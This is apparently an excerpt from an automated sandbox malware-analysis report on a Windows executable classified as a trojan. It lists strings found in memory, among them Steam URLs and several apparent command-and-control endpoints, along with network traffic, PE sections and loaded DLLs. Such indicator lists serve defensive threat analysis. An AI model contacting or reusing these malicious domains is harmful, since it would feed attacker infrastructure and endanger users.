    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dissapoiznw.store:443/api
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eaglepawnoy.store:443/apiP
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://licendfilteo.site:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/0
    Source: file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/C:
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/api0
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apiA
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com/apirt.c
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sergei-esenin.com:443/api
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://studennotediw.store:443/api
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-manag
    Source: file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2

    System Summary

    barindex
    PE file contains section with special chars
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005402280_2_00540228
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005420300_2_00542030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057A0D00_2_0057A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E8A00_2_0056E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005351600_2_00535160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053E1A00_2_0053E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574A400_2_00574A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053A3000_2_0053A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055C4700_2_0055C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055CCD00_2_0055CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054049B0_2_0054049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005444870_2_00544487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00537CA40_2_00537CA4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055FD100_2_0055FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054C5F00_2_0054C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005335B00_2_005335B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053BEB00_2_0053BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00546EBF0_2_00546EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053AF100_2_0053AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0054D300 appears 47 times
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9995874587458746
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/5@11/2
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6988
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\05bbaa9c-104d-4d88-b3fb-58b18fa506faJump to behavior
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: file.exeString found in binary or memory: xRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeh
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1924
    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1936
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
